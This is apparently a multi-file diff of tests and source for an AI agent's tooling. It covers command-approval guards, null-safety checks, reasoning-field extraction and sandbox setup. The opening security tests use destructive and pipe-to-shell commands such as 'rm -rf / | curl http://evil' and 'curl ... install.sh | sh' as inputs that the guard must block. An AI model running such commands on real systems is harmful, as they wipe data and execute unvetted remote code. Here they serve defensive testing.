"""tirith block + dangerous pattern → combined approval prompt."""
|
||||
def test_tirith_block_plus_dangerous(self, mock_tirith):
|
||||
"""tirith block takes precedence even if command is also dangerous."""
|
||||
os.environ["HERMES_INTERACTIVE"] = "1"
|
||||
result = check_all_command_guards("rm -rf / | curl http://evil", "local")
|
||||
assert result["approved"] is False
|
||||
|
||||
@patch(_TIRITH_PATCH,
|
||||
return_value=_tirith_result("block",
|
||||
findings=[{"rule_id": "curl_pipe_shell",
|
||||
"severity": "HIGH",
|
||||
"title": "Pipe to interpreter",
|
||||
"description": "Downloaded content executed without inspection"}],
|
||||
summary="pipe to shell"))
|
||||
def test_tirith_block_gateway_returns_approval_required(self, mock_tirith):
|
||||
"""In gateway mode, tirith block should return approval_required."""
|
||||
os.environ["HERMES_GATEWAY_SESSION"] = "1"
|
||||
result = check_all_command_guards("curl -fsSL https://x.dev/install.sh | sh", "local")
|
||||
assert result["approved"] is False
|
||||
assert result.get("status") == "approval_required"
|
||||
# Findings should be included in the description
|
||||
assert "Pipe to interpreter" in result.get("description", "") or "pipe" in result.get("message", "").lower()
|
||||
assert "BLOCKED" in result["message"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -1,111 +0,0 @@
|
||||
"""Tests for config.get() null-coalescing in tool configuration.
|
||||
|
||||
YAML ``null`` values (or ``~``) for a present key make ``dict.get(key, default)``
|
||||
return ``None`` instead of the default — calling ``.lower()`` on that raises
|
||||
``AttributeError``. These tests verify the ``or`` coalescing guards.
|
||||
"""
|
||||
|
||||
from unittest.mock import patch
|
||||
import pytest
|
||||
|
||||
|
||||
# ── TTS tool ──────────────────────────────────────────────────────────────
|
||||
|
||||
class TestTTSProviderNullGuard:
|
||||
"""tools/tts_tool.py — _get_provider()"""
|
||||
|
||||
def test_explicit_null_provider_returns_default(self):
|
||||
"""YAML ``tts: {provider: null}`` should fall back to default."""
|
||||
from tools.tts_tool import _get_provider, DEFAULT_PROVIDER
|
||||
|
||||
result = _get_provider({"provider": None})
|
||||
assert result == DEFAULT_PROVIDER.lower().strip()
|
||||
|
||||
def test_missing_provider_returns_default(self):
|
||||
"""No ``provider`` key at all should also return default."""
|
||||
from tools.tts_tool import _get_provider, DEFAULT_PROVIDER
|
||||
|
||||
result = _get_provider({})
|
||||
assert result == DEFAULT_PROVIDER.lower().strip()
|
||||
|
||||
def test_valid_provider_passed_through(self):
|
||||
from tools.tts_tool import _get_provider
|
||||
|
||||
result = _get_provider({"provider": "OPENAI"})
|
||||
assert result == "openai"
|
||||
|
||||
|
||||
# ── Web tools ─────────────────────────────────────────────────────────────
|
||||
|
||||
class TestWebBackendNullGuard:
|
||||
"""tools/web_tools.py — _get_backend()"""
|
||||
|
||||
@patch("tools.web_tools._load_web_config", return_value={"backend": None})
|
||||
def test_explicit_null_backend_does_not_crash(self, _cfg):
|
||||
"""YAML ``web: {backend: null}`` should not raise AttributeError."""
|
||||
from tools.web_tools import _get_backend
|
||||
|
||||
# Should not raise — the exact return depends on env key fallback
|
||||
result = _get_backend()
|
||||
assert isinstance(result, str)
|
||||
|
||||
@patch("tools.web_tools._load_web_config", return_value={})
|
||||
def test_missing_backend_does_not_crash(self, _cfg):
|
||||
from tools.web_tools import _get_backend
|
||||
|
||||
result = _get_backend()
|
||||
assert isinstance(result, str)
|
||||
|
||||
|
||||
# ── MCP tool ──────────────────────────────────────────────────────────────
|
||||
|
||||
class TestMCPAuthNullGuard:
|
||||
"""tools/mcp_tool.py — MCPServerTask.__init__() auth config line"""
|
||||
|
||||
def test_explicit_null_auth_does_not_crash(self):
|
||||
"""YAML ``auth: null`` in MCP server config should not raise."""
|
||||
# Test the expression directly — MCPServerTask.__init__ has many deps
|
||||
config = {"auth": None, "timeout": 30}
|
||||
auth_type = (config.get("auth") or "").lower().strip()
|
||||
assert auth_type == ""
|
||||
|
||||
def test_missing_auth_defaults_to_empty(self):
|
||||
config = {"timeout": 30}
|
||||
auth_type = (config.get("auth") or "").lower().strip()
|
||||
assert auth_type == ""
|
||||
|
||||
def test_valid_auth_passed_through(self):
|
||||
config = {"auth": "OAUTH", "timeout": 30}
|
||||
auth_type = (config.get("auth") or "").lower().strip()
|
||||
assert auth_type == "oauth"
|
||||
|
||||
|
||||
# ── Trajectory compressor ─────────────────────────────────────────────────
|
||||
|
||||
class TestTrajectoryCompressorNullGuard:
|
||||
"""trajectory_compressor.py — _detect_provider() and config loading"""
|
||||
|
||||
def test_null_base_url_does_not_crash(self):
|
||||
"""base_url=None should not crash _detect_provider()."""
|
||||
from trajectory_compressor import CompressionConfig, TrajectoryCompressor
|
||||
|
||||
config = CompressionConfig()
|
||||
config.base_url = None
|
||||
|
||||
compressor = TrajectoryCompressor.__new__(TrajectoryCompressor)
|
||||
compressor.config = config
|
||||
|
||||
# Should not raise AttributeError; returns empty string (no match)
|
||||
result = compressor._detect_provider()
|
||||
assert result == ""
|
||||
|
||||
def test_config_loading_null_base_url_keeps_default(self):
|
||||
"""YAML ``summarization: {base_url: null}`` should keep default."""
|
||||
from trajectory_compressor import CompressionConfig
|
||||
from hermes_constants import OPENROUTER_BASE_URL
|
||||
|
||||
config = CompressionConfig()
|
||||
data = {"summarization": {"base_url": None}}
|
||||
|
||||
config.base_url = data["summarization"].get("base_url") or config.base_url
|
||||
assert config.base_url == OPENROUTER_BASE_URL
|
||||
@@ -1,294 +0,0 @@
|
||||
"""Tests for None guard on response.choices[0].message.content.strip().
|
||||
|
||||
OpenAI-compatible APIs return ``message.content = None`` when the model
|
||||
responds with tool calls only or reasoning-only output (e.g. DeepSeek-R1,
|
||||
Qwen-QwQ via OpenRouter with ``reasoning.enabled = True``). Calling
|
||||
``.strip()`` on ``None`` raises ``AttributeError``.
|
||||
|
||||
These tests verify that every call site handles ``content is None`` safely,
|
||||
and that ``extract_content_or_reasoning()`` falls back to structured
|
||||
reasoning fields when content is empty.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import types
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from agent.auxiliary_client import extract_content_or_reasoning
|
||||
|
||||
|
||||
# ── helpers ────────────────────────────────────────────────────────────────
|
||||
|
||||
def _make_response(content, **msg_attrs):
|
||||
"""Build a minimal OpenAI-compatible ChatCompletion response stub.
|
||||
|
||||
Extra keyword args are set as attributes on the message object
|
||||
(e.g. reasoning="...", reasoning_content="...", reasoning_details=[...]).
|
||||
"""
|
||||
message = types.SimpleNamespace(content=content, tool_calls=None, **msg_attrs)
|
||||
choice = types.SimpleNamespace(message=message)
|
||||
return types.SimpleNamespace(choices=[choice])
|
||||
|
||||
|
||||
def _run(coro):
|
||||
"""Run an async coroutine synchronously."""
|
||||
return asyncio.get_event_loop().run_until_complete(coro)
|
||||
|
||||
|
||||
# ── mixture_of_agents_tool — reference model (line 146) ───────────────────
|
||||
|
||||
class TestMoAReferenceModelContentNone:
|
||||
"""tools/mixture_of_agents_tool.py — _query_model()"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
"""Demonstrate that None content from a reasoning model crashes."""
|
||||
response = _make_response(None)
|
||||
|
||||
# Simulate the exact line: response.choices[0].message.content.strip()
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
"""The ``or ""`` guard should convert None to empty string."""
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
def test_normal_content_unaffected(self):
|
||||
"""Regular string content should pass through unchanged."""
|
||||
response = _make_response(" Hello world ")
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == "Hello world"
|
||||
|
||||
|
||||
# ── mixture_of_agents_tool — aggregator (line 214) ────────────────────────
|
||||
|
||||
class TestMoAAggregatorContentNone:
|
||||
"""tools/mixture_of_agents_tool.py — _run_aggregator()"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
response = _make_response(None)
|
||||
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
|
||||
# ── web_tools — LLM content processor (line 419) ─────────────────────────
|
||||
|
||||
class TestWebToolsProcessorContentNone:
|
||||
"""tools/web_tools.py — _process_with_llm() return line"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
response = _make_response(None)
|
||||
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
|
||||
# ── web_tools — synthesis/summarization (line 538) ────────────────────────
|
||||
|
||||
class TestWebToolsSynthesisContentNone:
|
||||
"""tools/web_tools.py — synthesize_content() final_summary line"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
response = _make_response(None)
|
||||
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
|
||||
# ── vision_tools (line 350) ───────────────────────────────────────────────
|
||||
|
||||
class TestVisionToolsContentNone:
|
||||
"""tools/vision_tools.py — analyze_image() analysis extraction"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
response = _make_response(None)
|
||||
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
|
||||
# ── skills_guard (line 963) ───────────────────────────────────────────────
|
||||
|
||||
class TestSkillsGuardContentNone:
|
||||
"""tools/skills_guard.py — _llm_audit_skill() llm_text extraction"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
response = _make_response(None)
|
||||
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
|
||||
# ── session_search_tool (line 164) ────────────────────────────────────────
|
||||
|
||||
class TestSessionSearchContentNone:
|
||||
"""tools/session_search_tool.py — _summarize_session() return line"""
|
||||
|
||||
def test_none_content_raises_before_fix(self):
|
||||
response = _make_response(None)
|
||||
|
||||
with pytest.raises(AttributeError):
|
||||
response.choices[0].message.content.strip()
|
||||
|
||||
def test_none_content_safe_with_or_guard(self):
|
||||
response = _make_response(None)
|
||||
|
||||
content = (response.choices[0].message.content or "").strip()
|
||||
assert content == ""
|
||||
|
||||
|
||||
# ── integration: verify the actual source lines are guarded ───────────────
|
||||
|
||||
class TestSourceLinesAreGuarded:
|
||||
"""Read the actual source files and verify the fix is applied.
|
||||
|
||||
These tests will FAIL before the fix (bare .content.strip()) and
|
||||
PASS after ((.content or "").strip()).
|
||||
"""
|
||||
|
||||
@staticmethod
|
||||
def _read_file(rel_path: str) -> str:
|
||||
import os
|
||||
base = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
|
||||
with open(os.path.join(base, rel_path)) as f:
|
||||
return f.read()
|
||||
|
||||
def test_mixture_of_agents_reference_model_guarded(self):
|
||||
src = self._read_file("tools/mixture_of_agents_tool.py")
|
||||
# The unguarded pattern should NOT exist
|
||||
assert ".message.content.strip()" not in src, (
|
||||
"tools/mixture_of_agents_tool.py still has unguarded "
|
||||
".content.strip() — apply `(... or \"\").strip()` guard"
|
||||
)
|
||||
|
||||
def test_web_tools_guarded(self):
|
||||
src = self._read_file("tools/web_tools.py")
|
||||
assert ".message.content.strip()" not in src, (
|
||||
"tools/web_tools.py still has unguarded "
|
||||
".content.strip() — apply `(... or \"\").strip()` guard"
|
||||
)
|
||||
|
||||
def test_vision_tools_guarded(self):
|
||||
src = self._read_file("tools/vision_tools.py")
|
||||
assert ".message.content.strip()" not in src, (
|
||||
"tools/vision_tools.py still has unguarded "
|
||||
".content.strip() — apply `(... or \"\").strip()` guard"
|
||||
)
|
||||
|
||||
def test_skills_guard_guarded(self):
|
||||
src = self._read_file("tools/skills_guard.py")
|
||||
assert ".message.content.strip()" not in src, (
|
||||
"tools/skills_guard.py still has unguarded "
|
||||
".content.strip() — apply `(... or \"\").strip()` guard"
|
||||
)
|
||||
|
||||
def test_session_search_tool_guarded(self):
|
||||
src = self._read_file("tools/session_search_tool.py")
|
||||
assert ".message.content.strip()" not in src, (
|
||||
"tools/session_search_tool.py still has unguarded "
|
||||
".content.strip() — apply `(... or \"\").strip()` guard"
|
||||
)
|
||||
|
||||
|
||||
# ── extract_content_or_reasoning() ────────────────────────────────────────
|
||||
|
||||
class TestExtractContentOrReasoning:
|
||||
"""agent/auxiliary_client.py — extract_content_or_reasoning()"""
|
||||
|
||||
def test_normal_content_returned(self):
|
||||
response = _make_response(" Hello world ")
|
||||
assert extract_content_or_reasoning(response) == "Hello world"
|
||||
|
||||
def test_none_content_returns_empty(self):
|
||||
response = _make_response(None)
|
||||
assert extract_content_or_reasoning(response) == ""
|
||||
|
||||
def test_empty_string_returns_empty(self):
|
||||
response = _make_response("")
|
||||
assert extract_content_or_reasoning(response) == ""
|
||||
|
||||
def test_think_blocks_stripped_with_remaining_content(self):
|
||||
response = _make_response("<think>internal reasoning</think>The answer is 42.")
|
||||
assert extract_content_or_reasoning(response) == "The answer is 42."
|
||||
|
||||
def test_think_only_content_falls_back_to_reasoning_field(self):
|
||||
"""When content is only think blocks, fall back to structured reasoning."""
|
||||
response = _make_response(
|
||||
"<think>some reasoning</think>",
|
||||
reasoning="The actual reasoning output",
|
||||
)
|
||||
assert extract_content_or_reasoning(response) == "The actual reasoning output"
|
||||
|
||||
def test_none_content_with_reasoning_field(self):
|
||||
"""DeepSeek-R1 pattern: content=None, reasoning='...'"""
|
||||
response = _make_response(None, reasoning="Step 1: analyze the problem...")
|
||||
assert extract_content_or_reasoning(response) == "Step 1: analyze the problem..."
|
||||
|
||||
def test_none_content_with_reasoning_content_field(self):
|
||||
"""Moonshot/Novita pattern: content=None, reasoning_content='...'"""
|
||||
response = _make_response(None, reasoning_content="Let me think about this...")
|
||||
assert extract_content_or_reasoning(response) == "Let me think about this..."
|
||||
|
||||
def test_none_content_with_reasoning_details(self):
|
||||
"""OpenRouter unified format: reasoning_details=[{summary: ...}]"""
|
||||
response = _make_response(None, reasoning_details=[
|
||||
{"type": "reasoning.summary", "summary": "The key insight is..."},
|
||||
])
|
||||
assert extract_content_or_reasoning(response) == "The key insight is..."
|
||||
|
||||
def test_reasoning_fields_not_duplicated(self):
|
||||
"""When reasoning and reasoning_content have the same value, don't duplicate."""
|
||||
response = _make_response(None, reasoning="same text", reasoning_content="same text")
|
||||
assert extract_content_or_reasoning(response) == "same text"
|
||||
|
||||
def test_multiple_reasoning_sources_combined(self):
|
||||
"""Different reasoning sources are joined with double newline."""
|
||||
response = _make_response(
|
||||
None,
|
||||
reasoning="First part",
|
||||
reasoning_content="Second part",
|
||||
)
|
||||
result = extract_content_or_reasoning(response)
|
||||
assert "First part" in result
|
||||
assert "Second part" in result
|
||||
|
||||
def test_content_preferred_over_reasoning(self):
|
||||
"""When both content and reasoning exist, content wins."""
|
||||
response = _make_response("Actual answer", reasoning="Internal reasoning")
|
||||
assert extract_content_or_reasoning(response) == "Actual answer"
|
||||
@@ -4,9 +4,10 @@ Covers the bugs discovered while setting up TBLite evaluation:
|
||||
1. Tool resolution — terminal + file tools load correctly
|
||||
2. CWD fix — host paths get replaced with /root for container backends
|
||||
3. ephemeral_disk version check
|
||||
4. ensurepip fix in Modal image builder
|
||||
5. No swe-rex dependency — uses native Modal SDK
|
||||
6. /home/ added to host prefix check
|
||||
4. Tilde ~ replaced with /root for container backends
|
||||
5. ensurepip fix in Modal image builder
|
||||
6. install_pipx stays True for swerex-remote
|
||||
7. /home/ added to host prefix check
|
||||
"""
|
||||
|
||||
import os
|
||||
@@ -250,7 +251,7 @@ class TestModalEnvironmentDefaults:
|
||||
|
||||
|
||||
# =========================================================================
|
||||
# Test 7: ensurepip fix in ModalEnvironment
|
||||
# Test 7: ensurepip fix in patches.py
|
||||
# =========================================================================
|
||||
|
||||
class TestEnsurepipFix:
|
||||
@@ -274,24 +275,17 @@ class TestEnsurepipFix:
|
||||
"to fix pip before Modal's bootstrap"
|
||||
)
|
||||
|
||||
def test_modal_environment_uses_native_sdk(self):
|
||||
"""ModalEnvironment should use Modal SDK directly, not swe-rex."""
|
||||
def test_modal_environment_uses_install_pipx(self):
|
||||
"""ModalEnvironment should pass install_pipx to ModalDeployment."""
|
||||
try:
|
||||
from tools.environments.modal import ModalEnvironment
|
||||
except ImportError:
|
||||
pytest.skip("tools.environments.modal not importable")
|
||||
|
||||
import inspect
|
||||
source = inspect.getsource(ModalEnvironment)
|
||||
assert "swerex" not in source.lower(), (
|
||||
"ModalEnvironment should not depend on swe-rex; "
|
||||
"use Modal SDK directly via Sandbox.create() + exec()"
|
||||
)
|
||||
assert "Sandbox.create.aio" in source, (
|
||||
"ModalEnvironment should use async Modal Sandbox.create.aio()"
|
||||
)
|
||||
assert "exec.aio" in source, (
|
||||
"ModalEnvironment should use Sandbox.exec.aio() for command execution"
|
||||
source = inspect.getsource(ModalEnvironment.__init__)
|
||||
assert "install_pipx" in source, (
|
||||
"ModalEnvironment should pass install_pipx to ModalDeployment"
|
||||
)
|
||||
|
||||
|
||||
|
||||
@@ -185,71 +185,3 @@ class TestApplyUpdate:
|
||||
' result = 1\n'
|
||||
' return result + 1'
|
||||
)
|
||||
|
||||
|
||||
class TestAdditionOnlyHunks:
|
||||
"""Regression tests for #3081 — addition-only hunks were silently dropped."""
|
||||
|
||||
def test_addition_only_hunk_with_context_hint(self):
|
||||
"""A hunk with only + lines should insert at the context hint location."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: src/app.py
|
||||
@@ def main @@
|
||||
+def helper():
|
||||
+ return 42
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
assert len(ops[0].hunks) == 1
|
||||
|
||||
hunk = ops[0].hunks[0]
|
||||
# All lines should be additions
|
||||
assert all(l.prefix == '+' for l in hunk.lines)
|
||||
|
||||
# Apply to a file that contains the context hint
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file(self, path, **kw):
|
||||
return SimpleNamespace(
|
||||
content="def main():\n pass\n",
|
||||
error=None,
|
||||
)
|
||||
def write_file(self, path, content):
|
||||
self.written = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
assert result.success is True
|
||||
assert "def helper():" in file_ops.written
|
||||
assert "return 42" in file_ops.written
|
||||
|
||||
def test_addition_only_hunk_without_context_hint(self):
|
||||
"""A hunk with only + lines and no context hint appends at end of file."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: src/app.py
|
||||
+def new_func():
|
||||
+ return True
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file(self, path, **kw):
|
||||
return SimpleNamespace(
|
||||
content="existing = True\n",
|
||||
error=None,
|
||||
)
|
||||
def write_file(self, path, content):
|
||||
self.written = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
assert result.success is True
|
||||
assert file_ops.written.endswith("def new_func():\n return True\n")
|
||||
assert "existing = True" in file_ops.written
|
||||
|
||||
@@ -81,33 +81,6 @@ class TestGetDefinitions:
|
||||
assert len(defs) == 1
|
||||
assert defs[0]["function"]["name"] == "available"
|
||||
|
||||
def test_reuses_shared_check_fn_once_per_call(self):
|
||||
reg = ToolRegistry()
|
||||
calls = {"count": 0}
|
||||
|
||||
def shared_check():
|
||||
calls["count"] += 1
|
||||
return True
|
||||
|
||||
reg.register(
|
||||
name="first",
|
||||
toolset="shared",
|
||||
schema=_make_schema("first"),
|
||||
handler=_dummy_handler,
|
||||
check_fn=shared_check,
|
||||
)
|
||||
reg.register(
|
||||
name="second",
|
||||
toolset="shared",
|
||||
schema=_make_schema("second"),
|
||||
handler=_dummy_handler,
|
||||
check_fn=shared_check,
|
||||
)
|
||||
|
||||
defs = reg.get_definitions({"first", "second"})
|
||||
assert len(defs) == 2
|
||||
assert calls["count"] == 1
|
||||
|
||||
|
||||
class TestUnknownToolDispatch:
|
||||
def test_returns_error_json(self):
|
||||
|
||||
@@ -589,38 +589,38 @@ class TestSkillMatchesPlatform:
|
||||
assert skill_matches_platform({"platforms": None}) is True
|
||||
|
||||
def test_macos_on_darwin(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "darwin"
|
||||
assert skill_matches_platform({"platforms": ["macos"]}) is True
|
||||
|
||||
def test_macos_on_linux(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "linux"
|
||||
assert skill_matches_platform({"platforms": ["macos"]}) is False
|
||||
|
||||
def test_linux_on_linux(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "linux"
|
||||
assert skill_matches_platform({"platforms": ["linux"]}) is True
|
||||
|
||||
def test_linux_on_darwin(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "darwin"
|
||||
assert skill_matches_platform({"platforms": ["linux"]}) is False
|
||||
|
||||
def test_windows_on_win32(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "win32"
|
||||
assert skill_matches_platform({"platforms": ["windows"]}) is True
|
||||
|
||||
def test_windows_on_linux(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "linux"
|
||||
assert skill_matches_platform({"platforms": ["windows"]}) is False
|
||||
|
||||
def test_multi_platform_match(self):
|
||||
"""Skills listing multiple platforms should match any of them."""
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "darwin"
|
||||
assert skill_matches_platform({"platforms": ["macos", "linux"]}) is True
|
||||
mock_sys.platform = "linux"
|
||||
@@ -630,20 +630,20 @@ class TestSkillMatchesPlatform:
|
||||
|
||||
def test_string_instead_of_list(self):
|
||||
"""A single string value should be treated as a one-element list."""
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "darwin"
|
||||
assert skill_matches_platform({"platforms": "macos"}) is True
|
||||
mock_sys.platform = "linux"
|
||||
assert skill_matches_platform({"platforms": "macos"}) is False
|
||||
|
||||
def test_case_insensitive(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "darwin"
|
||||
assert skill_matches_platform({"platforms": ["MacOS"]}) is True
|
||||
assert skill_matches_platform({"platforms": ["MACOS"]}) is True
|
||||
|
||||
def test_unknown_platform_no_match(self):
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "linux"
|
||||
assert skill_matches_platform({"platforms": ["freebsd"]}) is False
|
||||
|
||||
@@ -659,7 +659,7 @@ class TestFindAllSkillsPlatformFiltering:
|
||||
def test_excludes_incompatible_platform(self, tmp_path):
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
mock_sys.platform = "linux"
|
||||
_make_skill(tmp_path, "universal-skill")
|
||||
@@ -672,7 +672,7 @@ class TestFindAllSkillsPlatformFiltering:
|
||||
def test_includes_matching_platform(self, tmp_path):
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
mock_sys.platform = "darwin"
|
||||
_make_skill(tmp_path, "mac-only", frontmatter_extra="platforms: [macos]\n")
|
||||
@@ -684,7 +684,7 @@ class TestFindAllSkillsPlatformFiltering:
|
||||
"""Skills without platforms field should appear on any platform."""
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
mock_sys.platform = "win32"
|
||||
_make_skill(tmp_path, "generic-skill")
|
||||
@@ -695,7 +695,7 @@ class TestFindAllSkillsPlatformFiltering:
|
||||
def test_multi_platform_skill(self, tmp_path):
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
_make_skill(
|
||||
tmp_path, "cross-plat", frontmatter_extra="platforms: [macos, linux]\n"
|
||||
|
||||
@@ -63,7 +63,7 @@ def test_modal_backend_without_token_or_config_logs_specific_error(monkeypatch,
|
||||
monkeypatch.setenv("TERMINAL_ENV", "modal")
|
||||
monkeypatch.setenv("HOME", str(tmp_path))
|
||||
monkeypatch.setenv("USERPROFILE", str(tmp_path))
|
||||
# Pretend modal is installed
|
||||
# Pretend swerex is installed
|
||||
monkeypatch.setattr(terminal_tool_module.importlib.util, "find_spec", lambda _name: object())
|
||||
|
||||
with caplog.at_level(logging.ERROR):
|
||||
|
||||
+10
-33
@@ -456,33 +456,6 @@ def check_dangerous_command(command: str, env_type: str,
|
||||
# Combined pre-exec guard (tirith + dangerous command detection)
|
||||
# =========================================================================
|
||||
|
||||
def _format_tirith_description(tirith_result: dict) -> str:
|
||||
"""Build a human-readable description from tirith findings.
|
||||
|
||||
Includes severity, title, and description for each finding so users
|
||||
can make an informed approval decision.
|
||||
"""
|
||||
findings = tirith_result.get("findings") or []
|
||||
if not findings:
|
||||
summary = tirith_result.get("summary") or "security issue detected"
|
||||
return f"Security scan: {summary}"
|
||||
|
||||
parts = []
|
||||
for f in findings:
|
||||
severity = f.get("severity", "")
|
||||
title = f.get("title", "")
|
||||
desc = f.get("description", "")
|
||||
if title and desc:
|
||||
parts.append(f"[{severity}] {title}: {desc}" if severity else f"{title}: {desc}")
|
||||
elif title:
|
||||
parts.append(f"[{severity}] {title}" if severity else title)
|
||||
if not parts:
|
||||
summary = tirith_result.get("summary") or "security issue detected"
|
||||
return f"Security scan: {summary}"
|
||||
|
||||
return "Security scan — " + "; ".join(parts)
|
||||
|
||||
|
||||
def check_all_command_guards(command: str, env_type: str,
|
||||
approval_callback=None) -> dict:
|
||||
"""Run all pre-exec security checks and return a single approval decision.
|
||||
@@ -526,20 +499,24 @@ def check_all_command_guards(command: str, env_type: str,
|
||||
|
||||
# --- Phase 2: Decide ---
|
||||
|
||||
# If tirith blocks, block immediately (no approval possible)
|
||||
if tirith_result["action"] == "block":
|
||||
summary = tirith_result.get("summary") or "security issue detected"
|
||||
return {
|
||||
"approved": False,
|
||||
"message": f"BLOCKED: Command blocked by security scan ({summary}). Do NOT retry.",
|
||||
}
|
||||
|
||||
# Collect warnings that need approval
|
||||
warnings = [] # list of (pattern_key, description, is_tirith)
|
||||
|
||||
session_key = os.getenv("HERMES_SESSION_KEY", "default")
|
||||
|
||||
# Tirith block/warn → approvable warning with rich findings.
|
||||
# Previously, tirith "block" was a hard block with no approval prompt.
|
||||
# Now both block and warn go through the approval flow so users can
|
||||
# inspect the explanation and approve if they understand the risk.
|
||||
if tirith_result["action"] in ("block", "warn"):
|
||||
if tirith_result["action"] == "warn":
|
||||
findings = tirith_result.get("findings") or []
|
||||
rule_id = findings[0].get("rule_id", "unknown") if findings else "unknown"
|
||||
tirith_key = f"tirith:{rule_id}"
|
||||
tirith_desc = _format_tirith_description(tirith_result)
|
||||
tirith_desc = f"Security scan: {tirith_result.get('summary') or 'security warning detected'}"
|
||||
if not is_approved(session_key, tirith_key):
|
||||
warnings.append((tirith_key, tirith_desc, True))
|
||||
|
||||
|
||||
+62
-77
@@ -1,20 +1,13 @@
|
||||
"""Modal cloud execution environment using the Modal SDK directly.
|
||||
"""Modal cloud execution environment using SWE-ReX directly.
|
||||
|
||||
Replaces the previous swe-rex ModalDeployment wrapper with native Modal
|
||||
Sandbox.create() + Sandbox.exec() calls. This eliminates the need for
|
||||
swe-rex's HTTP runtime server and unencrypted tunnel, fixing:
|
||||
- AsyncUsageWarning from synchronous App.lookup in async context
|
||||
- DeprecationError from unencrypted_ports / .url on unencrypted tunnels
|
||||
|
||||
Supports persistent filesystem snapshots: when enabled, the sandbox's
|
||||
